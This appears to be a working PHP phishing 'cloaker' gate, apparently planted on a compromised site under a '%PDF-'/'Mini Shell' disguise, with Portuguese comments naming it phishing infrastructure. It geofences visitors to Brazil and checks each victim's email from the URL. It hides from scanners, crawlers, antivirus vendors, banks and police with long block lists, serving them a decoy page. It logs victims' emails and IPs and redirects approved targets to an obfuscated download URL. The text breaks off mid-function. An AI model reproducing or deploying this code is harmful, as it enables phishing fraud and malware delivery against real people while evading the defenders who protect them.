%PDF-
%PDF-
Mini Shell
Mini Shell
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
//set_time_limit(0);
date_default_timezone_set("America/Sao_Paulo");
setlocale(LC_ALL, 'pt_BR');
session_start();
require_once("zica.php");
$REDIR_BLOG = "https://www.youtube.com/watch?v=ZFDflpXuiUA"; //SEMPRE USAR UM BLOG RELACIONADO AO PHISHING
$REDIR_SITE = "./teste.php?download=1"; //SEMPRE COLOCAR COM A BARRA NO FINAL
$ISP_BLOCK = array("123planosdesaude","VAULTVPN","activescan","alpha2","amazon","Amazon","ancombraterney","anti-phishing","antipishing","antispam","antivirus","avast","bancopastor","bancopopular","banesto","bankofamerica","barracuda","bitdefender","bradesco","cajamadrid","clamav","clamwin","cleandir","colocrossing","coloup","datapacket","delitosinformaticos","detector","dimenoc","dnblead","donategrid","dufrio","easysol","eset","eveocloud","f-secure","fasano","fbi","fraudwatchinternational","free-av","gfihispana","google","google-proxy","greenmountainaccess","grisoft","hands","hauri-la","hispasec","instantcheckmain","itau","iwgroup","kapersky","laarnes","letti","linode","mailcontrol","frantech ","mailstream","mallshill","marimex","mcafee","mgconecta","microsoft","midphase","monitor","choopa","nephosdns","netcraft","spectrumnet","SPECTRUMNET","nod32","norton","offerzz1","onlinedc","opendns","gigenet","owned-networks","panda","pandasoftware","paypal","phish","pish","prcdn","protectedgroup","quadranet","rsghosting","sajonaramail","santander","scaleway","scotiabank","security","seguridad","sescsp","sophos","spamfirewall2","spfbl","symantec","thinins","vps","trendmicro","trustwave","unicaja","verisign","veritas","viabcp","vnunet","vultr","wbinfo","webandseo ","zonealarm","avast","avg","Hetzner","Alibaba","Telegram","DigitalOcean","Apple Inc","OVH SAS","cloudflare","tele2 netherlands","ovh","DCTWO","Google LLC","baidu","A100 ROW","LDCOM","Amazon Technologies Inc.","seguridad","cisco systems","cisco","ColoCrossing","123Systems","yellownet");
$EMAILS_BLOCK = array("sicredi","skynet.be","scotiabank.com","walla.com","example.com","cisco.com","pim.ac.th","qzdnetf.com","yopmail.com","gmil.com","bb.com.br","bb.com","ivanatenorio","sumitomocorp","cpovo","fator","gov.br","espn","mitsui","localiza","petelove","uolinc","hotmial","hotmailo","guyfieri","andrew@","hotmaill","20hotmail","andrewcrees","vipmail","uark","fuck","optilink","fbi","police","imsn","safeonweb","suspect","address","us.gov",".gov","joao.barreto.f@","fuck","fuck@","none","ufpa","dpf","cambuhy","funcesp", "naha","tishmanspeyer","cga","petrobras","sure2profit",".ded",".dbz",".pbz",".ce",".oe","naver","thomson",".va","opayq","info@","indianoil","livetraderglobal");
$HTTP_REFERER = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "REFERER_NULL";
$IP = getClientIp();
$DATA = date('d/m/Y H:i:s');
$HOST = gethostbyaddr($IP);
$HASH_GERADO = getRootDomain();
$idButton1 = generateRandomString(rand(10,20));
$idinput1 = generateRandomString(rand(10,20));
$idinput2 = generateRandomString(rand(10,20));
$iddiv1 = generateRandomString(rand(10,20));
$iddiv2 = generateRandomString(rand(10,20));
$htmlSource = '
<html>
<head>
<title>Welcome to '.getRootDomain().'</title>
<meta name="description" content="">
'.randomCSS().'
'.randomCSS_LINES().'
<style>
@font-face {
font-family: "Arial,Helvetica,sans-serif";
font-style: normal;
}
a {
color: green;
}
.logo {
font-family: Arial,Helvetica,sans-serif;
font-weight: 100;
}
html, body {
background: #ffffff;
margin: 50px;
width: 100%;
height: 100%;
}
.footer {
position: fixed;
color: gray;
font-style: italic;
bottom: 5px;
margin: 5px;
}
table, span, input, p {
opacity: 0.1;
}
.overflowx { position: relative; text-indent: -999999px; background-repeat: no-repeat; font-size: 1px;}
</style>
<link href="data:image/x-icon;base64,AAABAAEAEBAAAAAAAABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AJCQk/yQkJP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/0ZGRv8XFxf/////AP///wD///8A////AP///////////////+7u7v9OTk7/sbGx/11dXf9KSkr///////////+lpaX/4eHh/////wD///8A////AAAAAP8AAAD///////////+8vLz///////X19f/t7e3/gICA/5eXl////////////wAAAP8AAAD/////AKysrP8AAAD/AAAA/wAAAP+enp7/////////////////////////////////5OTk/wAAAP8AAAAAAAAAAAAD/AAAA/6ysrP////8A////AP///wCurq6PlJSUzP///wD///8A////AP///wD///8A////AJSUlMyQkJDY////AP///wD///8A////AP///wD///8AAAAAAAAAAA/wAAAP////8A////AP///wD///8A////AP///wAAAAD/AAAA/////wD///8A////AP///wD///8AAAAA/wAAAP8AAAD/////AP///wD///8A////AP///wD///8AAAAA/wAAAP8AAAD/////AP///wD///8ACwsL/wAAAP8AAAD/lJSU2AAAAP8AAAAAAAAAAAAAAAAAAAAAD/cnJy/1hYWP8AAAD/AAAAAAAAAAAAAAAAAAAA/2FhYdgHBwf/AAAA/wAAAP////8A////AP///wD///8A////AP///wAAAAD/s7Oz/wAAAP8AAAD/x8fH/wAAAP////8A////AP///wD///8A////AP///wD///8A////AP///wAAAAD/AAAA/////wAAAAD/AAAA/////wAAAAD/AAAA/////wD///8A////AP///wD///8A////AP///wD///8AAAAA/wAAAP+qqqqlAAAA/wAAAP9lZWXjAAAA/wAAAP////8A////AP///wD///8A////AP///wD///8A////ALa2tv////8A9vb2UQAAAP8AAAD/////Uf///wDAwMD/////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wBcXFz/AAAA/////wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A//8AAP//AADAAwAAwAMAAIABAAAAAAAAAAAAAAAAAA5+cAAOfnAADH4wAAgAEAAPgfAADyTwAA8A8AAPZvAAD+fwAA//8AAA==" rel="icon" type="image/x-icon" />
</head>
<body>
'.gerarDivs(rand(15,25)).'
<form class="'.generateRandomString(rand(5,10)).'" id="'.$idButton1.'" action="./" method="POST">
<input type="email" name="email" class="'.generateRandomString(rand(5,10)).'">
</form>
<h1 class="'.generateRandomString(rand(5,10)).'" align="left">Hello!</h1>
<h2 class="'.generateRandomString(rand(5,10)).'" align="left">Welcome to '.getRootDomain().' website v2.4.5</h2>
<br><br>
'.gerarDivs(rand(15,25)).'
<span class="'.generateRandomString(rand(5,10)).'">
<p>
<p></p>
</p>
</span>
'.gerarDivs(rand(15,25)).'
<div align="right" class="'.generateRandomString(rand(5,10)).' footer">Contact us: +3293992001 info@'.getRootDomain().'</div>
<br>
<br>
<br>
<a class="'.generateRandomString(rand(5,10)).'" align="right" href="#/">Privacy Policy</a>
'.gerarDivs(rand(15,25)).'
</body>
</html>
';
/* ------------------------------- \/ CHECA IP NO TXT BLOQUEADOS \/ ------------------------------
1) VERIFICA SE IP JÁ ESTA NA LISTA DE BLOQUEADOS
*/
// if(file_exists("./BLOQUEADOS.txt")){
// $BLOQUEADOS = file_get_contents("BLOQUEADOS.txt");
// if(strpos($BLOQUEADOS, $IP) !== false){
// // $conteudo = $DATA."|IP_IN_LIST|QUERY_NULL|".$HASH_GERADO."|".$IP ."|". $HOST ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
// // file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
// header('Location: '.$REDIR_BLOG);
// exit();
// }
// }
$geolocalizacao = json_decode(GET("http://ip-api.com/json/".$IP));
if ($geolocalizacao->country !== "Brazil"){
$conteudo = $DATA."|IP_NO_BR||".$IP ."|". $HOST ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
print $htmlSource;
exit();
}
/* ----------------------- \/ GERA HASH UNICO E COLOCA NA URL FINAL \/ ------------------------------
1) SUBSTITUI CARACTER DA POSIÇÃO INDICADA PELA STRING $CODE_
EX: QUALQUER COISA QUE ESTIVER NA LETRA "A" É SUBSTITUIDA PELA ORDEM DA VARIAVEL $CODE_ ABBBBBBBBBBBBBABBBBBBBBBBBBBBBBA
ABBBBBBBBBBBBBABBBBBBBBBBBBBBBBA = 1BBBBBBBBBBBBB9BBBBBBBBBBBBBBBB0 = TUDO QUE FOR B É RANDOMICO, ENTÃO SÓ AS POSIÇÕES ESPECIFICADAS SÃO AS MESMAS ;)
*/
$posicao_1 = 0;
$posicao_2 = 14;
$posicao_3 = 31;
$CODE_1 = "1";
$CODE_2 = "9";
$CODE_3 = "0";
$HASH_GERADO = substr_replace(substr_replace(substr_replace(md5(uniqid(rand(), true)),$CODE_1,$posicao_1,1),$CODE_2,$posicao_2,1),$CODE_3,$posicao_3,1);
/* ----------------------- \/ OFUSCA A URL FINAL DA PHISHING \/ ------------------------------
1) TRANSFORMA TODAS AS LETRAS EM BYTES E COLOCA UM VALOR RANDOMICO NO INICIO E NO FINAL DO BYTE
2) LÁ NO JAVASCRIPT ELE RETIRA ESSE PRIMEIRO E ULTIMO CARACTERS RANDOMICO, PRA CONSEGUIR TRANSFORMAR O BYTE EM ASCII CORRETAMENTE
*/
$REDIR_SITE_FINAL = "";
for ($i=0; $i <strlen($REDIR_SITE) ; $i++) {
$REDIR_SITE_FINAL .= rand(1,9).ord($REDIR_SITE[$i]).rand(1,9).",";
}
$REDIR_SITE_FINAL = substr($REDIR_SITE_FINAL, 0, -1);
/* ------------------------------- \/ AQUI PRA BAIXO COMEÇA AS PROTEÇÕES... \/ ------------------------------
/* ------------------------------- \/ AQUI PRA BAIXO COMEÇA AS PROTEÇÕES... \/ ------------------------------
/* ------------------------------- \/ AQUI PRA BAIXO COMEÇA AS PROTEÇÕES... \/ ------------------------------
/* ------------------------------- \/ AQUI PRA BAIXO COMEÇA AS PROTEÇÕES... \/ ------------------------------
/* ------------------------------- \/ PROTEÇÃO QUERY STRING \/ ------------------------------
1) VERIFICA SE O ACESSO É FEITO POR GET, VERIFICA SE EXISTE ALGUMA VARIAVEL NO GET
2) SETA QUALQUER VALOR QUE VIR NO GET (tudo depois de /?) NA VARIAVEL $QUERY_STRING -
2.a) EXEMPLO: url.com/?teste@gmail.com - SETA $QUERY_STRING = 'teste@gmail.com'
2.B) EXEMPLO: url.com/?penis=teste@gmail.com - SETA $QUERY_STRING = 'penis=teste@gmail.com'
3) CHECA SE O $QUERY_STRING É UM EMAIL VÁLIDO.
*/
if($_SERVER['REQUEST_METHOD'] == "GET" AND count($_REQUEST) > 0){
$QUERY_STRING = strtolower($_SERVER['QUERY_STRING']); // PEGA TUDO DEPOIS DO /?
//$QUERY_STRING = str_replace('%0a', '', $QUERY_STRING);
$QUERY_STRING = strtolower($_GET['cid']); // SO PEGA O GET SETADO /?cid=
if (filter_var($QUERY_STRING, FILTER_VALIDATE_EMAIL) === false) {
$conteudo = $DATA."|NO_EMAIL|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|". $HOST ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
//header('Location: '.$REDIR_BLOG);
print $htmlSource;
exit();
}
// Verifica se o domínio do email tem um registro MX válido
$domain = substr(strrchr($QUERY_STRING, "@"), 1);
if (!checkdnsrr($domain, "MX")) {
$conteudo = $DATA . "|NO_MX|" . $QUERY_STRING . "|" . $HASH_GERADO . "|" . $IP . "|" . $HOST . "|" . $HTTP_REFERER . "|" . Get_OS() . "|" . $_SERVER['HTTP_USER_AGENT'] . "\n";
file_put_contents("./BLOQUEADOS.txt", $conteudo, FILE_APPEND);
print $htmlSource;
exit();
}
foreach($EMAILS_BLOCK as $ROWS){
if(strpos($QUERY_STRING, $ROWS) == true){
$conteudo = $DATA."|MAIL_BLOQUEADO|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|". $HOST ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
//header('Location: '.$REDIR_BLOG);
print $htmlSource;
exit();
}
}
$REDIR_SITE = $REDIR_SITE;
}else{
$conteudo = $DATA."|NO_QUERY_STRING|QUERY_NULL|".$HASH_GERADO."|".$IP ."|". $HOST ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
//header('Location: '.$REDIR_BLOG);
print $htmlSource;
exit();
}
/* ------------------------------- \/ CHECA IP NO TXT \/ ------------------------------
1) VERIFICA SE JÁ ACESSOU, SE ACESSOU E TIVER O IP DIFERENTE ELE BLOQUEIA ACESSO
*/
// if(file_exists("./LIBERADOS.txt")){
// $LIBERADOS = file_get_contents("LIBERADOS.txt");
// if(strpos($LIBERADOS, $QUERY_STRING) !== false){
// $LIBERADOS = explode("\n",$LIBERADOS);
// foreach ($LIBERADOS as $key => $value) {
// if(strpos($value, $QUERY_STRING) !== false){
// $ROW = explode("|",$value);
// $IP_SALVO = $ROW[3];
// if($IP_SALVO !== $IP){
// $conteudo = $DATA."|IP_DIFERENTE|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|". $HOST ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
// file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
// header('Location: '.$REDIR_BLOG);
// exit();
// }
// }
// }
// }
// }
/* ------------------------------- \/ PROTEÇÃO BOT USER-AGENT \/ ------------------------------*/
if (preg_match('/Googlebot\/|Googlebot-Mobile|Googlebot-Image|Googlebot-News|Googlebot-Video|AdsBot-Google([^-]|$)|AdsBot-Google-Mobile|Feedfetcher-Google|Mediapartners-Google|Mediapartners \(Googlebot\)|APIs-Google|bingbot|Slurp|[wW]get|LinkedInBot|Python-urllib|python-requests|libwww-perl|httpunit|nutch|Go-http-client|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|BIGLOTRON|Teoma|convera|seekbot|Gigabot|Gigablast|exabot|ia_archiver|GingerCrawler|webmon |HTTrack|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|findlink|msrbot|panscient|yacybot|AISearchBot|ips-agent|tagoobot|MJ12bot|woriobot|yanga|buzzbot|mlbot|YandexBot|YandexImages|YandexAccessibilityBot|YandexMobileBot|purebot|Linguee Bot|CyberPatrol|voilabot|Baiduspider|citeseerxbot|spbot|twengabot|postrank|TurnitinBot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|Ahrefs(Bot|SiteAudit)|fuelbot|CrunchBot|IndeedBot|mappydata|woobot|ZoominfoBot|PrivacyAwareBot|Multiviewbot|SWIMGBot|Grobbot|eright|Apercite|semanticbot|Aboundex|domaincrawler|wbsearchbot|summify|CCBot|edisterbot|seznambot|ec2linkfinder|gslfbot|aiHitBot|intelium_bot|facebookexternalhit|Yeti|RetrevoPageAnalyzer|lb-spider|Sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|OrangeBot\/|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|S[eE][mM]rushBot|yoozBot|lipperhey|Y!J|Domain Re-Animator Bot|AddThis|Screaming Frog SEO Spider|MetaURI|Scrapy|Livelap[bB]ot|OpenHoseBot|CapsuleChecker|collection@infegy.com|IstellaBot|DeuSu\/|betaBot|Cliqzbot\/|MojeekBot\/|netEstate NE Crawler|SafeSearch microdata crawler|Gluten Free Crawler\/|Sonic|Sysomos|Trove|deadlinkchecker|Slack-ImgProxy|Embedly|RankActiveLinkBot|iskanie|SafeDNSBot|SkypeUriPreview|Veoozbot|Slackbot|redditbot|datagnionbot|Google-Adwords-Instant|adbeat_bot|WhatsApp|contxbot|pinterest.com.bot|electricmonk|GarlikCrawler|BingPreview\/|vebidoobot|FemtosearchBot|Yahoo Link Preview|MetaJobBot|DomainStatsBot|mindUpBot|Daum\/|Jugendschutzprogramm-Crawler|Xenu Link Sleuth|Pcore-HTTP|moatbot|KosmioBot|pingdom|AppInsights|PhantomJS|Gowikibot|PiplBot|Discordbot|TelegramBot|Jetslide|newsharecounts|James BOT|Bark[rR]owler|TinEye|SocialRankIOBot|trendictionbot|Ocarinabot|epicbot|Primalbot|DuckDuckGo-Favicons-Bot|GnowitNewsbot|Leikibot|LinkArchiver|YaK\/|PaperLiBot|Digg Deeper|dcrawl|Snacktory|AndersPinkBot|Fyrebot|EveryoneSocialBot|Mediatoolkitbot|Luminator-robots|ExtLinksBot|SurveyBot|NING\/|okhttp|Nuzzel|omgili|PocketParser|YisouSpider|um-LN|ToutiaoSpider|MuckRack|Jamie\'s Spider|AHC\/|NetcraftSurveyAgent|Laserlikebot|^Apache-HttpClient|AppEngine-Google|Jetty|Upflow|Thinklab|Traackr.com|Twurly|Mastodon|http_get|DnyzBot|botify|007ac9 Crawler|BehloolBot|BrandVerity|check_http|BDCbot|ZumBot|EZID|ICC-Crawler|ArchiveBot|^LCC |filterdb.iss.net\/crawler|BLP_bbot|BomboraBot|Buck\/|Companybook-Crawler|Genieo|magpie-crawler|MeltwaterNews|Moreover|newspaper\/|ScoutJet|(^| )sentry\/|StorygizeBot|UptimeRobot|OutclicksBot|seoscanners|Hatena|Google Web Preview|MauiBot|AlphaBot|SBL-BOT|IAS crawler|adscanner|Netvibes|acapbot|Baidu-YunGuanCe|bitlybot|blogmuraBot|Bot.AraTurka.com|bot-pge.chlooe.com|BoxcarBot|BTWebClient|ContextAd Bot|Digincore bot|Disqus|Feedly|Fetch\/|Fever|Flamingo_SearchEngine|FlipboardProxy|g2reader-bot|G2 Web Services|imrbot|K7MLWCBot|Kemvibot|Landau-Media-Spider|linkapediabot|vkShare|Siteimprove.com|BLEXBot\/|DareBoost|ZuperlistBot\/|Miniflux\/|Feedspot|Diffbot\/|SEOkicks|tracemyfile|Nimbostratus-Bot|zgrab|PR-CY.RU|AdsTxtCrawler|Datafeedwatch|Zabbix|TangibleeBot|google-xrawler|axios|Amazon CloudFront|Pulsepoint|CloudFlare-AlwaysOnline|Google-Structured-Data-Testing-Tool|WordupInfoSearch|WebDataStats|HttpUrlConnection|Seekport Crawler|ZoomBot|VelenPublicWebCrawler|MoodleBot|jpg-newsbot|outbrain|W3C_Validator|Validator\.nu|W3C-checklink|W3C-mobileOK|W3C_I18n-Checker|FeedValidator|W3C_CSS_Validator|W3C_Unicorn|Google-PhysicalWeb|Blackboard|ICBot\/|BazQux|Twingly|Rivva|Experibot|awesomecrawler|Dataprovider.com|GroupHigh\/|theoldreader.com|AnyEvent|Uptimebot\.org|Nmap Scripting Engine|2ip.ru|Clickagy|Caliperbot|MBCrawler|online-webceo-bot|B2B Bot|AddSearchBot|Google Favicon|HubSpot|Chrome-Lighthouse|HeadlessChrome|CheckMarkNetwork\/|www\.uptime\.com|Streamline3Bot\/|serpstatbot\/|MixnodeCache\/|^curl|baidu|SimpleScraper|RSSingBot|Jooblebot|fedoraplanet|Friendica|NextCloud|Tiny Tiny RSS|RegionStuttgartBot|Bytespider|Datanyze|Avast|cloudflare|Fiddler|Avg|Google-Site-Verification/', $_SERVER['HTTP_USER_AGENT'])) {
//$conteudo = $DATA."|USER-AGENT_BLOCK|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|". $ISP_IP ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
$conteudo = $DATA."|USER-AGENT_BLOCK|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
//header('Location: '.$REDIR_BLOG);
print $htmlSource;
exit();
}
/* ------------------------------- \/ PROTEÇÃO BOT CHECAR ISP \/ ------------------------------*/
//foreach($ISP_BLOCK as $ROWS){
// if(strpos($ISP_IP, strtolower($ROWS)) !== false){
// $conteudo = $DATA."|ISP_BLOCK|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|". $ISP_IP ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
// file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
// //header('Location: '.$REDIR_BLOG);
// print $htmlSource;
// exit();
// }
//}
/* ------------------------------- \/ PROTEÇÃO BOT CHEKA IP BLACKLIST \/ ------------------------------*/
//if($API->ip_blacklist){
// $conteudo = $DATA."|IP_BLACKLIST|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|". $ISP_IP ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
// file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
// //header('Location: '.$REDIR_BLOG);
// print $htmlSource;
// exit();
//}
/* ------------------------------- \/ PROTEÇÃO BOT CHEKA USER AGENT EXTERNO \/ ------------------------------*/
//if($API->useragent_blacklist){
// $conteudo = $DATA."|USER-AGENT_BLOCK2|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP ."|". $ISP_IP ."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
// file_put_contents("./BLOQUEADOS.txt", $conteudo , FILE_APPEND);
// //header('Location: '.$REDIR_BLOG);
// print $htmlSource;
// exit();
//}
/* ---- \/ SE TODOS OS BLOQUEIOS FOREM FALSE, ELE SALVA O TXT DE ACESSO LIBERADO E CONTINUA SCRIPT PARA O BLOQUEIO EM JAVASCRIPT \/ ------------*/
//$conteudo = $DATA."|".$QUERY_STRING. "|".$HASH_GERADO."|".$IP."|".$ISP_IP."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
//file_put_contents("./LIBERADOS.txt", $conteudo , FILE_APPEND);
//
// $emailcript = base64_encode($QUERY_STRING);
// //print $htmlSource;
// //$_SESSION['usuario'] = md5(RandonID(5));
// header('Location: '.$REDIR_SITE);
// Obtém o conteúdo a ser salvo no log
$conteudo = $DATA."|".$QUERY_STRING."|".$HASH_GERADO."|".$IP."|".$ISP_IP."|".$HTTP_REFERER."|".Get_OS()."|".$_SERVER['HTTP_USER_AGENT']."\n";
// Lê o conteúdo do arquivo LIBERADOS.txt
$liberadosFile = './LIBERADOS.txt';
$liberadosContent = file_exists($liberadosFile) ? file($liberadosFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
// Verifica se o email já existe no arquivo
$emailExistente = false;
foreach ($liberadosContent as $linha) {
$dados = explode('|', $linha);
if (isset($dados[1]) && $dados[1] === $QUERY_STRING) {
$emailExistente = true;
break;
}
}
// Se o email não existir, salva o novo conteúdo
if (!$emailExistente) {
file_put_contents($liberadosFile, $conteudo, FILE_APPEND);
}
// Redireciona o usuário
$emailcript = base64_encode($QUERY_STRING);
header('Location: ' .$REDIR_SITE."");
/* ------------------------------- \/ FUNÇÕES - get_ip() E Get_OS() \/ ------------------------------*/
function get_ip(){$variables = array('REMOTE_ADDR', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'HTTP_X_COMING_FROM', 'HTTP_COMING_FROM', 'HTTP_CLIENT_IP');$return = '';foreach ($variables as $variable){if (isset($_SERVER[$variable])){$return = $_SERVER[$variable];break;}}return $return;}
function RandonID($tamanho) {
$alphabet = "ABCDEFGHJKMNOPQRSTUWXYZ0123456789";
$pass = array();
$alphaLength = strlen($alphabet) - 1;
for ($i = 0; $i < $tamanho; $i++) {
$n = rand(0, $alphaLength);
$pass[] = $alphabet[$n];
}
return implode($pass);
}
function Get_OS(){
if (preg_match('/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i',$_SERVER['HTTP_USER_AGENT'])||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i',substr($_SERVER['HTTP_USER_AGENT'],0,4))){
$RETORNO = "MOBILE";
}else{
$RETORNO = "DESKTOP";
}
return $RETORNO;
}
function GET($URL){
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
));
//curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:8888');
curl_setopt($ch, CURLOPT_TIMEOUT, 40);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_URL, $URL);
//curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
ob_start();
return curl_exec ($ch); // execute the curl command
ob_end_clean();
curl_close ($ch);
unset($ch);
}
function getRootDomain() {
$server_name = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : false;
$root_domain = 'https://api.google.info';
//$proto = isset($_SERVER['HTTP_X_FORWARDED_PROTO']) ? $_SERVER['HTTP_X_FORWARDED_PROTO'] : 'https';
$proto = '';
if($server_name) {
$subdomains = explode('.', $server_name);
if(is_array($subdomains) && !empty($subdomains)) {
$last = end($subdomains);
$count_last_key = array_search($last, $subdomains);
$main_domain = $subdomains[$count_last_key - 1];
$tld = $subdomains[$count_last_key];
$root_domain = $main_domain . '.' . $tld;
}
}
return $root_domain;
}
function getClientIp() {
if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
return $_SERVER["HTTP_CF_CONNECTING_IP"];
